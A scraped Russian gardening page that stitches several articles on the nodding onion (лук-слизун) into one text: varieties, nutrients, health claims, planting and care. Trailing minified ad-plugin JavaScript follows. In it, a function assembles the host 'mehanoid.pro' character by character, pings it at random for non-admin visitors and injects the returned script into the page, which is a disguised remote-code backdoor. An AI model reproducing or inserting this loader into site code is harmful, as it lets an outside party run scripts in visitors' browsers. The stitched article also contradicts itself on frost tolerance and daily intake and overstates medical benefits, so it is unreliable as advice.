5 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Популярные сорта лука слизуна

Холодостойкий вид лука «Слизун»

Долгое время лук-слизун выращивала лишь малая часть огородников, но в последнее время его популярность выросла. Увеличение числа поклонников культуры связано с ее неприхотливостью, богатым химическим составом и приятным вкусом без горчинки. С возделыванием лука-слизуна справятся даже начинающие огородники. Для этого достаточно ознакомиться с нюансами и правилами его выращивания.

Описание культуры

Лук-слизун — многолетний представитель семейства Лилейные. После посадки он каждую весну дает ранний урожай в течение 4-5 лет. Культура считается отличным медоносом — своим ароматом привлекает рабочих пчел и отгоняет насекомых-вредителей. Именно поэтому опытные огородники предпочитают размещать эту разновидность лука на грядках с другими растениями.

Справка. Название «слизун» растение получило из-за высокого содержания особых слизистых веществ. Их используют для лечения язвы желудка и гастрита с повышенной кислотностью.

Самыми популярными и полезными сортами лука-слизуна считаются:

Происхождение и развитие

В естественной среде дикие разновидности слизуна встречаются на Алтае, в Сибири и Средней Азии. В какой-то момент люди отметили, что растением с удовольствием лакомится домашний скот, и попробовали употребить его в пищу. Со временем сочные ростки начали выращивать на огородах, что привело к окультуриванию слизуна.

Химический состав

Лук-слизун обладает богатым химическим составом. В него входят следующие полезные вещества:

  • витамин С — 18,8 мг;
  • марганец — 0,16 мг;
  • цинк — 0,39 мг;
  • железо — 1,48 мг;
  • калий — 276 мг;
  • каротин — 0,598 мг;
  • витамин В9 — 64 мкг;
  • пантотеновая кислота — 0,075 мг;
  • холин — 5,7 мг;
  • витамин РР — 0,525 мг.

Все они отлично усваиваются организмом, а при регулярном употреблении лука-слизуна оказывают лечебный эффект.

Справка. Зелень этого лука обладает низкой калорийностью — всего 32 ккал на 100 г продукта.

Польза и вред

Зелень рекомендуют внести в рацион при:

  • анемии — повышает гемоглобин;
  • инфекционных заболеваниях — улучшает иммунитет, снимает воспаление;
  • плохом аппетите — улучшает работу ЖКТ и нормализует кислотно-щелочной баланс;
  • ломкости сосудов — улучшает состояние сердечно-сосудистой системы, нормализует давление;
  • нарушениях обмена веществ — стабилизирует работу щитовидной железы и уровень гормонов.

Вред для здоровья:

  • риск возникновения аллергии и индивидуальной непереносимости;
  • появление изжоги;
  • сухость кожи при наружном применении;
  • обострение хронических заболеваний органов ЖКТ и мочевыделительной системы.

Срок созревания

Первые всходы появляются через 20-35 дней после посева, на это влияют температура воздуха и влажность грунта. Во второй год зелень проклевывается сразу же после схода снега, а первый урожай готов к срезке в конце апреля – начале мая.

Урожайность

Слизун активно наращивает зеленую массу на протяжении всего периода вегетации. С каждым годом количество побегов увеличивается, на второй год жизни растение обзаводится 3-4 веточками с 8-10 листьями. К пятому году их количество достигает 20-25, а на одном кустике образуется до 200 листочков.

Лук-слизун — очень урожайное растение. Особенно выделяется сорт Грин. При хорошем уходе за одну срезку он дает до 6 кг зелени с 1 м².

Важно! Не выращивайте слизун дольше 5 лет, так как к этому моменту растение «устает» и снижает побегообразование.

Устойчивость к болезням

От дикорастущих предков культурные сорта лука-слизуна получили неприхотливость, способность отпугивать вредителей и высокий иммунитет к различным заболеваниям. Дополнительной устойчивостью к грибковым и вирусным поражениям лук наделили селекционеры в процессе работы над новыми сортами.

Характеристика луковицы, описание внешнего вида, вкусовые качества

У лука-слизуна темно-зеленые листья, покрытые светлым восковым налетом. Они обладают островатым привкусом, а при надломе выделяют слизистый сок. Второе название этой разновидности — поникающий лук. Растение получило его из-за своих стрелок: молодые имеют скрученный вид и склоняются к земле. По мере роста стрелки постепенно выпрямляются, вытягиваются до 100 см, а на их верхушках образуются сиренево-лиловые соцветья.

У слизуна развита корневая система, но настоящей луковицы у него нет. От корневища диаметром 1,5-2 см отрастают мелкие ложные луковички цилиндрической формы. К концу периода вегетации они разрастаются вокруг центрального корешка и образуют цельную «луковицу» диаметром до 25-30 см. Некоторые огородники используют такие корнеплоды в пищу, но лук-слизун чаще всего выращивают только для получения зелени.

Молодые листочки добавляют в маринады, салаты и едят вприкуску с основными блюдами. Они обладают нежным, слегка сладковатым вкусом с легкой горчинкой, чесночным ароматом и полностью лишены остроты.

Регионы для выращивания

Слизун зимостоек и не боится холодов, поэтому его выращивают во всех регионах России. Культура отлично приживается и растет в Сибири, где выдерживает понижение температуры до -40°С, даже если земля не укрыта снегом.

Внимание! Лук-слизун влаголюбив, но погибает при частых зимних оттепелях.

Преимущества и недостатки сорта

Слизун обладает рядом преимуществ. К ним относятся:

  • высокая урожайность;
  • раннее появление зелени;
  • уникальный химический состав;
  • приятный вкус и аромат;
  • неприхотливость;
  • морозостойкость;
  • возможность выращивать культуру в течение 4-5 лет после посадки.

Но как всякое огородное растение, эта разновидность имеет ряд недостатков:

  • плохая реакция на затопления грядки во время оттепелей и сильных дождей;
  • мелкие луковицы;
  • непереносимость долгих засух.

Отличие от других сортов

Среди особенностей слизуна:

  • отсутствие периода покоя;
  • зелень долгое время сохраняет сочность и быстро отходит после заморозков;
  • урожай собирают до осени, так как листва не грубеет и не становится горькой;
  • долго хранится в срезанном виде.

В отличие от других видов лука, слизун содержит небольшое количество эфирных масел, поэтому совсем не горчит.

Особенности посадки и выращивания

Лук-слизун — неприхотливое растение, оно не требует сложного ухода и особых условий выращивания. Однако для получения качественного и обильного урожая важно знать правила посадки и возделывания этой культуры.

Подготовка к посадке

Перед посевом посадочный материал подготавливают:

  1. Семена помещают в слабый раствор марганцовки на 10 секунд, после чего промывают в проточной воде.
  2. Затем их замачивают в стимуляторе роста, например, «Эпине». Для этого в 2 л воды разводят 1 мл препарата.
  3. Через 8-10 часов семена извлекают из раствора и тщательно просушивают.

На рассаду лук-слизун высаживают в начале марта. Деревянный ящик или пластиковый контейнер заполняют питательным грунтом и делают в нем бороздки глубиной 10 мм. Их обильно поливают теплой водой и выкладывают в углубления семена на расстоянии 1 см друг от друга.

Посадки засыпают легким субстратом и опрыскивают с помощью пульверизатора. Емкость закрывают стеклом, целлофановым пакетом или полиэтиленовой пленкой. Укрывной материал удаляют после того, как появляются первые всходы.

Требования к грунту

Слизун предпочитает плодородные суглинистые почвы и хорошо растет на торфяниках. Место под грядку тщательно перекапывают, разбивают земляные комки и удаляют корни сорных трав. С осени почву рекомендуется перекапывать с перегноем или навозом, а весной добавлять в посадочные лунки немного мочевины или специального удобрения для чеснока.

Культура не переносит высокую кислотность почвы. Это приводит к загрубению листвы, лишает ее сочности, а также тормозит рост и формирование слизуна.

Сроки, схема и правила посадки

Посадку в открытый грунт осуществляют после того, как снег полностью сойдет, а почва успеет подсохнуть и прогреться. В северных регионах это происходит в мае, тогда как в южных посев нередко производят в конце апреля. Это делается по следующей схеме:

  • глубина бороздок — 15 мм;
  • расстояние между рядами — 40 см;
  • между растениями — 15-20 см.

Культура не боится ветров и холодов, поэтому ее можно сажать на открытых, незащищенных участках. Но лучше подготовить высокую грядку, чтобы слизун не страдал от застоев влаги и затоплений.

Нюансы ухода

Такой лук выращивают как многолетнюю культуру. Его листву срезают в течение всего лета, это не сказывается на обильности урожая и образовании мелких луковиц. Между полными сборами урожая делают перерыв в 2-3 недели, так как новые перья отрастают за 15-20 дней.

Без пересадок и размножения лук активно растет 4-5 лет, а затем начинает стареть: рост замедляется, побеги отмирают. В стрелку эта разновидность уходит поздно, ближе к концу июля.

Слизун нуждается в минимальном уходе, его выращивание не требует вложения денежных средств, а также большой траты времени и сил.

Режим полива

Из-за недостатка влаги перья лука становятся жесткими и теряют сочность. В засушливые периоды слизун обильно поливают раз в два дня. При нормальной погоде график полива определяют самостоятельно, следя за тем, чтобы земля на грядке всегда оставалась влажной.

Внимание! Чтобы уменьшить испарение воды и защитить культуру от сорняков, рекомендуется мульчировать посадки торфом, сеном или скошенной травой.

Рыхление почвы и прополка

После дождей и поливов грядку рыхлят, чтобы не допускать образования плотной корки на поверхности земли. Иначе она будет мешать воздуху проникать к корневой системе, и луковицы начнут гнить. Сорные растения удаляют по мере их возникновения.

Подкормка

Для получения богатого урожая опытные огородники подкармливают лук-слизун:

  1. Осенью грядку перекапывают с навозом или компостом (7-8 кг/м²).
  2. Весной под каждое растение вносят 5 г карбамида.
  3. После срезки большого количества перьев 1 м² почвы удобряют 30 г суперфосфата и 15 г калийной соли.

Борьба с болезнями и вредителями

Из вредителей лук-слизун привлекает только луковую муху. Чтобы избавиться от этого насекомого, кустики и почву на грядке опрыскивают раствором, приготовленным по следующему рецепту:

  • стружка из хозяйственного мыла — 50 г;
  • древесная зола — 100 г;
  • вода — 6 л.

Слизун устойчив ко многим болезням, но его поражают патогенные микроорганизмы. В этом случае культуру поливают раствором марганцовки. Для этого 10 г перманганата калия разводят в 2 л теплой воды. Также этим средством обрабатывают места срезов зелени.

Сбор и хранение урожая

Знание особенностей сбора и хранения лука-слизуна позволит долгое время лакомиться витаминной зеленью.

Как и когда собирать

Урожай собирают в течение всего дачного сезона. Перья срезают чистым, острым ножом или ножницами. Последний раз перья убирают в конце августа, после чего прекращают поливать растение.

Особенности хранения и лежкость сорта

Зелень фасуют по полиэтиленовым пакетам и помещают в холодильник. Лук сохраняет свежесть и сочность в течение одной недели. Также урожай рубят, распределяют по контейнерам и отправляют в морозилку. Замороженные перья будут пригодны для употребления в пищу всю зиму.

Важно! Чтобы восполнить недостаток аминокислот и минералов, достаточно в течение дачного сезона ежедневно съедать 250-300 мг перьев слизуна.

Советы опытных огородников

Опытные дачники, которые не первый год выращивают слизун на своих участках, делятся советами по уходу за этой культурой. Они отмечают, что для получения сочных перьев важно:

  • всегда держать почву на грядке влажной;
  • не забывать о мульчировании;
  • не допускать сильного переувлажнения;
  • высаживать кустики на возвышенностях или насыпных высоких грядках;
  • срезать листья длиной 15-20 см.

Отзывы о луке-слизуне

Лук-слизун имеет уже много положительных отзывов.

Иван, г. Казань: «Выращиваю лук-слизун на своем огороде около 10 лет. Каждые 2-3 года размножаю его делением луковиц или подсаживаю семена. Очень нравится, что у него нежная зелень без горечи, которую не страшно давать детям».

Анфиса, г. Азов: «Слизун не только дает сочную и полезную зелень, но и обладает хорошими декоративными качествами. Особенно красиво он смотрится с сиреневыми шариками-соцветиями».

Заключение

Лук-слизун обладает хорошим вкусом и множеством полезных качеств. Употребление витаминной зелени в пищу не только укрепляет иммунную систему, но и устраняет признаки авитаминоза. Неприхотливость и отсутствие особых требований к условиям произрастания делают эту культуру востребованной на дачных участках и огородах.

Лук слизун: описание и особенности ухода

Сорта многолетнего лука имеют большую популярность у садоводов. Они обладают хорошей устойчивостью к холодам, хорошо растут на одном месте более пяти лет. Их главный плюс то что зелень, обогащенная витаминами, вырастает намного раньше, чем у репчатого лука.

Описание

Существует большое количество сортов многолетнего лука. Среди популярных сортов можно выделить анзур, лук-слизун, шнитт-лук, черемша и другие. Выращивание, а также уход для этих сортов имеют много общих моментов.

Для посадки такого лука лучше выбирать хорошо освещенные места, многие садоводы выбирают участки по краям огорода, где посадки лука не будут мешать обработке земли. Эти растения неприхотливы к различным условиям выращивания, основное требование – кислотность почвы, она не должна быть слишком кислой.

При разведении многолетнего лука на садовых участках, его богатую витаминами зелень можно употреблять с начала весны до наступления первых морозов. Посадив такой лук в помещении, вы будете иметь урожай зелени всю зиму.

Все сорта многолетних луков имеют свои достоинства. Они являются источником витаминов и минеральных веществ, а также обладают бактерицидными свойствами.

Общие сведения

На срезе перьев этого сорта капельками выделяется жидкость похожая на слезы, поэтому он и получил это название. В природе этот сорт произрастает в степных районах, на лугах и каменистых почвах запада и востока Сибири.

Небольшое количество эфирных масел – основное достоинство этого сорта, благодаря которому его вкус практически не имеет горечи. Он обладает хорошими лекарственными свойствами, имеет декоративный вид и является медоносом.

В составе зелени этого лука содержится множество полезных веществ: витамин С, каротин, фитонциды и минеральные соли. В его составе содержится большое количество солей железа, которые необходимы для профилактики и лечения болезней крови таких как анемия или другие.

Вкус этого лука практически не имеет горечи, потому что в нем мало эфирных масел, а также он обладает небольшим чесночным ароматом. Его сочные, слабо острые листья, в отличие от других сортов, дети едят с удовольствием. Свежесть и сочность срезанных листьев в прохладном месте сохраняются не менее недели.

Внешний вид

Слизун – невысокое растение с мясистыми сочными листьями. Форма листа линейная с закругленным кончиком. Отличается от большинства других сортов тем что его листья не имеют внутри полости, они плоские на подобии чеснока, их длина 25-30 сантиметров, а ширина 2-2,5 сантиметра.

Листья сближены у основания стебля и образуют пышную розетку, поверхность их покрыта восковым налетом. Листовые пластины имеют винтообразные изгибы вокруг продольной оси. Они достаточно сочные при этом достаточно хрупкие.

Внешне это растение очень напоминает душистый лук, отличие его в том, что листья толще и больше по ширине. За первый год после посадки у растения формируется 2 побега, а на каждом из них по 4-5 листьев. С каждым годом количество побегов увеличивается, в возрасте 4-5 лет у растения уже может быть 28-30 побегов. После 5-6 лет новые побеги перестают образовываться и растение начинает стареть.

Новые листья у растения образуются в течении всего вегетационного периода. После того как растает снег рост сохранившихся листьев восстанавливается, и начинает появляться молодая листа. Окончание роста листвы происходит только осенью, когда наступают регулярные минусовые температуры.

Листва слизуна не склона к огрубению и обладает сочностью с неизменным вкусов весь период от весны до осени. В конце лета и осенью, когда листья других сортов желтеют и грубеют этот лук всегда будет свежим и пригодным к употреблению в свежем виде. Сорт лука-слизун имеет хороший иммунитет к большинству заболеваний.

В другой статье мы описывали другой сорт лука — Индийский лук

Луковицы в привычном ее виде у этого сорта нет. Корневая система этого растения хорошо разрастается, корневище имеет толщину около 1,5-2 сантиметров и углублено в грунт на 3-5 сантиметров, на нем образуются небольшие ложные луковицы.

Ложными луковицами называют утолщения на корневище в форме цилиндров. Постепенно в период вегетации образуются все новые луковицы, они развиваются по окружность вокруг одной центральной луковицы. Каждая луковица покрыта чешуйками, которые к концу вегетационного периода подсыхают.

От корневища и донца растения отходит большое количество корней, их глубина может достигать 60 сантиметров. Во второй год жизни растение образует первые цветоносные стрелки. Высота стрелки 50-60 сантиметров, она грубая и не употребляется в пищу. Цветки имеют светлый розовый или сиреневый цвет. Соцветие в виде зонтика с большим количеством цветков 80-100 штук.

Стрелки этого сорта лука не имеют внутри полости, до того, как распустится соцветие она поникшая, поэтому сот имеет еще название «поникший лук».

Выращивание и уход

Лук-слизун хорошо растет на различных почвах с достаточным увлажнением.

Размножение

Размножение происходит семенами или разделением куста. Высадку можно делать в период со второй половины апреля до середины лета. Если посадку делать позже растение не успеет окрепнуть до начала холодов и не сумеет перенести зиму. Сеять лук нужно на равнинных участках в несколько рядков с расстоянием до 50 сантиметров между рядами, 25-30 сантиметров между кустами. После посева всходы появятся на 20-30 день.

Посадка

Посадку также можно делать одиночными кустами. После достижения 2-3 летнего возраста растение выкапывают и разделяют, затем рассаживают по 15-30 луковиц. Посадка, как и семенами должна быть с расстояниями 50 сантиметров между рядами, а между кустами 20-30 сантиметров. Уход за луком включает регулярное рыхление почвы вокруг кустов, прополку, своевременный полив и удобрение.

Сорная трава сильно затрудняет рост и развитие растения, поэтому перед посадкой участок нужно полностью очистить от сорняков, удалить все их корни. В период роста нужно регулярно удалять появляющиеся сорняки предотвращая их разрастание.

Срез листов

Срезку листы в течение одного сезона делают около 5 раз. При отрастании первых 5-6 листьев их необходимо срезать и сделать подкормку азотными удобрениями или органикой. Когда перья вырастают до 30 сантиметров их можно срезать по мере необходимости, важно следить чтобы они не перерастали и становились грубыми.

В период цветения лук подкармливают минеральными удобрениями. Осенью лук подкармливают удобрениями с фосфором и калием, они помогут ему лучше перенести зимние холода. В конце октября проводится удаление всех листьев и стрелок. Один квадратный метр посадок приносит до 5 килограмм зелени.

Это растение можно высаживать как в однолетнее или многолетнее растение. Выращивая его как однолетнюю культуру, посадку делают рассадой с 3-4 листами. Высадку лучше проводить по 3-4 растения в одной лунке на расстоянии по 30 сантиметров. Через полтора месяца после высадки рассады можно будет собирать урожай, а на его место можно посадить другие культуры, которые успеют вырасти, такие, как укроп или редис.

Температура

Морозостойкость этого растения позволяет выращивать его как многолетнюю культуру. Его молодые побеги стойко переносят холода до -6℃.

Для того чтобы иметь свежую и сочную зелень в течении долгого периода с весны до поздней осень, сорт лука-слизун подходит лучше всего. Его листва обладает слабой горечью и мало подвержена огрубению поэтому он всегда пригоден для употребления.

Неприхотливое в уходе и к почве растение будет давать урожай полезной зелени не менее 5 лет. При этом его можно высаживать и в качестве декоративного украшения сада или в клумбах.

Лук слизун: описание сорта и возможные заболевания

Время на чтение: 7 минут

Основным требованием овощеводов при выборе сорта лука, является быстрое созревание зеленых перьев, неприхотливость в уходе и высокие показатели урожайности. Именно к таким разновидностям овощной культуры относится лук сорта Слизун. Культура легко приживается в любых климатических зонах, редко подвергается поражению болезнями и вредоносными насекомыми, а необычные вкусовые характеристики позволяют использовать овощ для приготовления любимых блюд.

Лук слизун – описание и характеристика растения

В естественной среде лук Слизун встречается в степях и предгорьях Средней Азии и Сибири. Растение характеризуется устойчивостью к низким температурам, легко переносит морозы до -40 градусов.

  1. В отличие от других сортов лука, культура не формирует репчатый корнеплод, а ограничивается уплотненным корневищем, которое также пригодно для употребления в пищу.
  2. Зеленая масса густая, с широкими, плоскими перьями изумрудного оттенка.
  3. К моменту созревания, перо достигает высоты в 50-60 сантиметров, а ширины – до 2,5-3 сантиметров.
  4. Ценится культура за мягкий чесночный вкус и отсутствием в зелени горечи.

На второй год роста у растения появляется стрелка с цветоносом, распускающимся лиловым шарообразным цветком с приятным ароматом. Лук сорта Слизун помимо пищевого применения, часто используется для декорирования клумб и цветников на приусадебных участках.

Сорта и разновидности

Благодаря работе ученых-селекционеров лук сорта Слизун получил множество разновидностей, отличающихся сроками вызревания и внешним видом.

  • Лук сорта Салатный вызревает через 1,5 месяца после высадки в открытый грунт. Перья сочные, плоские с чесночным привкусом и ароматом. За сезон с одного куста получают до 3 килограмм свежей зелени.
  • Разновидность под названием Грин характеризуется высоким природным иммунитетом. Культура легко переносит морозы, не поражается болезнями и вредоносными насекомыми. С квадратного метра грядки за сезон получают до 7 килограмм зеленых перьев.
  • Слизун сорта Карлик отличается миниатюрным размером кустов, достигающих отметки не более 20 сантиметров. Растение не требовательно к условиям произрастания, поэтому культивируется во всех климатических зонах.
  • После посева сорта Лидер, зеленые перья пригодны для употребления уже на 25-30 сутки. С квадратного метра посадок получают до 4 килограмм ароматного лука.
  • Сортовая разновидность лука Симбир характеризуется устойчивостью к низким температурам и повышенным витаминным составом зеленых перьев.

А вот разновидность под названием Вальс отличается декоративным видом. Листовой покров кустов закручивается по спирали, что придает растению необычный вид. Слизун сорта Вальс часто высаживают в качестве украшения приусадебного участка и альпийских горок.

Чем полезен лук: плюсы и минусы выращивания

В составе корневищ и зеленых перьев Слизуна содержится огромное количество аскорбиновой кислоты, рибофлавина, каротина и тиамина. Также, овощная культура является поставщиком аминокислот, макро и микроэлементов, необходимой для правильной работы организма.

  1. При вводе Слизуна в ежедневный рацион питания улучшается работа сердечнососудистой системы.
  2. Понижается холестерин.
  3. Сосуды становятся более эластичными и прочными.
  4. Улучшается структура волос и ногтевых пластин.
  5. Входящие в состав макро и микроэлементы нормализуют работы желудочно-кишечного тракта.
  6. Нормализуют работы лимфатической системы и щитовидной железы.
  7. Помогают при анемии и малокровии.
  8. Выводят из организма вредные накопления и токсины.

У овощной культуру имеются и противопоказания:

  1. Не рекомендовано употреблять культуру в период беременности и кормления грудью.
  2. При обострениях подагры.
  3. Во время обострений желудочных и кишечных заболеваний.

Сорт лука Слизун

Лук-слизун или поникающий лук – это интересное, многолетнее растение. Он не так известен, как порей или шнитт, но также пользуется спросом. Это лекарственная культура, богатая витаминами и минералами. Дает зелень на протяжении всего теплого периода года и украшает участок, не требуя серьезного ухода. В этой статье дана характеристика культуры и рекомендации по ее выращиванию.

Лук слизун – описание

Лук-слизун родом из Монголии, Средней Азии и Восточной Сибири. Культура отличается от других видов лука как по внешним качествам, так и по выращиванию, вкусу и даже методике сбора урожая. Так что перед тем как посадить это растение, нужно изучить его особенности.

Лук-слизун – многолетняя луко-корневищная культура. В диком виде встречается часто, но культивируется лишь любителями вида. Растение холодостойкое, переносит даже суровые, морозные зимы без утепления. Если не контролировать рост, куст может сильно разрастаться.

Лук слизун — описание культуры

Корневая система представлена ложной луковицей с развитыми корнями. Наземная часть – розетка, образованная широкими, плоскими листочками, закругленными на верхушке. Листья культуры зеленые, очень сочные, плотные, если их переломить, можно увидеть много выделяющейся слизи. Высота листьев может достигать 30 см, а ширина – 2 см. Через год после посадки, растение выпускает стрелку длиной до 70 см с красивым соцветием. Обычно это происходит с июля по август. Бутоны окрашены в белый или лиловый цвет. Семена созревают неравномерно, их собирают обычно в 3 приема.

Популярные сорта лука слизуна

Через год после посадки, растение выпускает стрелку длиной до 70 см с красивым соцветием

В продаже можно встретить разные сорта лука-слизуна. Ниже представлены некоторые из них.

  • «Карлик» – среднеспелый сорт. Листья зеленые с сизым налетом, растут до 25 см в длину. С квадрата участка можно собирать до 1,5 кг урожая за год. Урожай используется преимущественно для салатов. Сорт устойчив к морозам.
  • «Лидер» – среднеспелый сорт. Листья светло-зеленые. Стебель и корневая система морозоустойчивые. Урожайность – 2 кг/м². Вкус слабоострый, в листьях много витаминов и сахара. Аромат больше чесночный, а не луковый.
  • «Грин» – компактная разновидность полураскидистого лука с развитой корневой системой. Листья большие, плоские, темно-зеленого цвета. Вкус сочный, нежный, с легким чесночным запахом. При должном уходе с 1 м² участка можно собрать около 6 кг урожая. Ценится за неприхотливость, приятный вкус, устойчивость к заболеваниям и морозам.

Полезные свойства лука

Сорт лука слизуна «Карлик»

Лук-слизун отличается приятным вкусом, чесночным ароматом и ценится высоко, потому что имеет разные полезные свойства.

  • Листья содержат витамины B1, B2, C, PP и минералы (калий, железо, цинк, молибден, магний), необходимые для укрепления сердца и сосудов. Рекомендуются людям, что болеют малокровием.
  • Слизистое вещество этого продукта благотворно влияет на пищеварение, так что листья лука-слизуна прописывают при лечении язвы и гастрита.
  • Каротин, фитонциды, сахара в составе – способствуют выведению токсинов.
  • Листья растения нередко используют для заживления ран. Они не только имеют эффект обеззараживания, но и снимают боль.
  • Лук-слизун укрепляет иммунитет, содержит природный антибиотик, полисахариды, глюкозу.
  • Культура положительно сказывается на состоянии волос, если делать из нее маски, примочки, ванночки.
  • Врачи отмечают положительное действие слизуна на репродуктивную женскую и мужскую систему.

Полезные свойства лука-слизуна на этом не заканчиваются. Считается, что при регулярном употреблении он способствует тонизированию мышц и всего тела, нормализует работу щитовидки и даже омолаживает организм.

Вред лука слизуна

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};